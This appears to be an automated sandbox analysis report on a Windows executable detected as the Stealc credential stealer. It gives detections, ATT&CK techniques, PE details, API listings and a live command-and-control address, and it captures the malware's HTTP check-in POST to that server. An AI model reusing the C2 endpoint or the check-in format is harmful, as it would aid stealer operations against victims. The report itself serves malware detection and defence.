Source: Yara match

File source: Process Memory Space: file.exe PID: 3136, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00609790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00609790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006098E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_006098E0

Source: file.exe, file.exe, 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006375A8 cpuid

0_2_006375A8

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00607D20

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00607B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00607B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006079E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_006079E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00607BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00607BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2143190137.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3136, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2143190137.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3136, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	33 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	33 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	13 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	334 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.phpd	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpM	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206	file.exe, 00000000.00000002.2189856639.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.206/6c4adf523b719729.phpy	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpz	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.php%	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpU	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpe	file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://docs.rs/getrandom#nodejs-es-module-support	file.exe, file.exe, 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2143190137.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546221
Start date and time:	2024-10-31 16:34:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 19 Number of non-executed functions: 127
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.206	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.957759795153841
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'137'088 bytes
MD5:	9ee120f9536a150c01a708c545dfe737
SHA1:	e09dd49e147b47b6234a1cceba6c7c1f46cfe562
SHA256:	d3cbd6a1899c35e285104442edb74f93eb064d01aff39df137f66fed9448619d
SHA512:	46b09b9de936dd941cf94f4eba50016ab873e91bc3ff01d75920595b106b942ac1782b3a896017dd34fb1728193b93df28a651529b2dbc76a520eb30253eacea
SSDEEP:	49152:0da/6ELvAoi5AAvZtHKwBsxTCT+pydLp3gJeriYZLn:8a5v85NnBsxTCTDp3g9YB
TLSH:	2FA533FB1873907CF4CA06331D5B698EB829794A2DFB6D0CE3580FB12A74398745E646
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xb29000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007EFD08CABA2Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e9050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e91f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x2e7000	0x67600	63ac7948fa6728f999e3b581fbe5ea1c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e8000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2e9000	0x1000	0x200	049071433b9f7c843453337b0fd53002	False	0.1328125	data	0.8946074494647072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x2ea000	0x29f000	0x200	f4306a452682f3509c3f8fb5a1f5b5d2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eqnrkxus	0x589000	0x19f000	0x19ec00	a5c388a0404819e40478fe9c1411db7a	False	0.9945791657248343	data	7.953335707487061	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
upizgxhc	0x728000	0x1000	0x400	1c55d0a7931b40f117c2b4d596fb1c73	False	0.8095703125	data	6.254214867643525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x729000	0x3000	0x2200	394f1156d16eda1f033e2b1511cbbfc9	False	0.06215533088235294	DOS executable (COM)	0.776534911506904	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T16:35:02.626849+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49710	185.215.113.206	80	TCP
2024-10-31T16:35:16.648870+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.6	49752	TCP
2024-10-31T16:35:55.098627+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.6	49941	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 16:35:01.392779112 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:01.397731066 CET	80	49710	185.215.113.206	192.168.2.6
Oct 31, 2024 16:35:01.397819042 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:01.398403883 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:01.403327942 CET	80	49710	185.215.113.206	192.168.2.6
Oct 31, 2024 16:35:02.328778982 CET	80	49710	185.215.113.206	192.168.2.6
Oct 31, 2024 16:35:02.329014063 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:02.332288980 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:02.337182999 CET	80	49710	185.215.113.206	192.168.2.6
Oct 31, 2024 16:35:02.626771927 CET	80	49710	185.215.113.206	192.168.2.6
Oct 31, 2024 16:35:02.626848936 CET	49710	80	192.168.2.6	185.215.113.206
Oct 31, 2024 16:35:05.100511074 CET	49710	80	192.168.2.6	185.215.113.206

HTTP Request Dependency Graph

185.215.113.206

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	185.215.113.206	80	3136	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 16:35:01.398403883 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Oct 31, 2024 16:35:02.328778982 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 15:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 31, 2024 16:35:02.332288980 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 41 44 32 45 34 43 36 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="hwid"8E0AD2E4C67B1953448019------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="build"tale------GIIIECBGDHJJKFIDAKJD--
Oct 31, 2024 16:35:02.626771927 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 15:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	11:34:57
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x5f0000
File size:	2'137'088 bytes
MD5 hash:	9EE120F9536A150C01A708C545DFE737
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2143190137.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	1327
Total number of Limit Nodes:	24

Executed Functions

Function 00609BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00F415A8), ref: 00609BF1
GetProcAddress.KERNEL32(76210000,00F41728), ref: 00609C0A
GetProcAddress.KERNEL32(76210000,00F415D8), ref: 00609C22
GetProcAddress.KERNEL32(76210000,00F41518), ref: 00609C3A
GetProcAddress.KERNEL32(76210000,00F416F8), ref: 00609C53
GetProcAddress.KERNEL32(76210000,00F48AF8), ref: 00609C6B
GetProcAddress.KERNEL32(76210000,00F35488), ref: 00609C83
GetProcAddress.KERNEL32(76210000,00F35688), ref: 00609C9C
GetProcAddress.KERNEL32(76210000,00F41608), ref: 00609CB4
GetProcAddress.KERNEL32(76210000,00F41620), ref: 00609CCC
GetProcAddress.KERNEL32(76210000,00F41710), ref: 00609CE5
GetProcAddress.KERNEL32(76210000,00F41638), ref: 00609CFD
GetProcAddress.KERNEL32(76210000,00F355A8), ref: 00609D15
GetProcAddress.KERNEL32(76210000,00F41740), ref: 00609D2E
GetProcAddress.KERNEL32(76210000,00F417A0), ref: 00609D46
GetProcAddress.KERNEL32(76210000,00F355C8), ref: 00609D5E
GetProcAddress.KERNEL32(76210000,00F414E8), ref: 00609D77
GetProcAddress.KERNEL32(76210000,00F41500), ref: 00609D8F
GetProcAddress.KERNEL32(76210000,00F355E8), ref: 00609DA7
GetProcAddress.KERNEL32(76210000,00F41890), ref: 00609DC0
GetProcAddress.KERNEL32(76210000,00F356A8), ref: 00609DD8
LoadLibraryA.KERNEL32(00F41848,?,00606CA0), ref: 00609DEA
LoadLibraryA.KERNEL32(00F41878,?,00606CA0), ref: 00609DFB
LoadLibraryA.KERNEL32(00F41830,?,00606CA0), ref: 00609E0D
LoadLibraryA.KERNEL32(00F41860,?,00606CA0), ref: 00609E1F
LoadLibraryA.KERNEL32(00F418A8,?,00606CA0), ref: 00609E30
GetProcAddress.KERNEL32(75B30000,00F417E8), ref: 00609E52
GetProcAddress.KERNEL32(751E0000,00F41800), ref: 00609E73
GetProcAddress.KERNEL32(751E0000,00F41818), ref: 00609E8B
GetProcAddress.KERNEL32(76910000,00F48D10), ref: 00609EAD
GetProcAddress.KERNEL32(75670000,00F353A8), ref: 00609ECE
GetProcAddress.KERNEL32(77310000,00F48C68), ref: 00609EEF
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00609F06

Strings

NtQueryInformationProcess, xrefs: 00609EFA

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 16f279e92eec1774786968188db181e1302924d320d85688195df9ea85b17b88
Instruction ID: 10780bc6fbae2ab965a82d825613cb71e93194e1283d379e6120cd2e6245ea4c
Opcode Fuzzy Hash: 16f279e92eec1774786968188db181e1302924d320d85688195df9ea85b17b88
Instruction Fuzzy Hash: 4FA1EAB56182009FC344DFA9FC88D567BB9F749701B18862BFA1AC3274EB35A950CF64

Function 005F4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 005F465E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005F47EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F47C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F47CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F47AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F47B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46C8
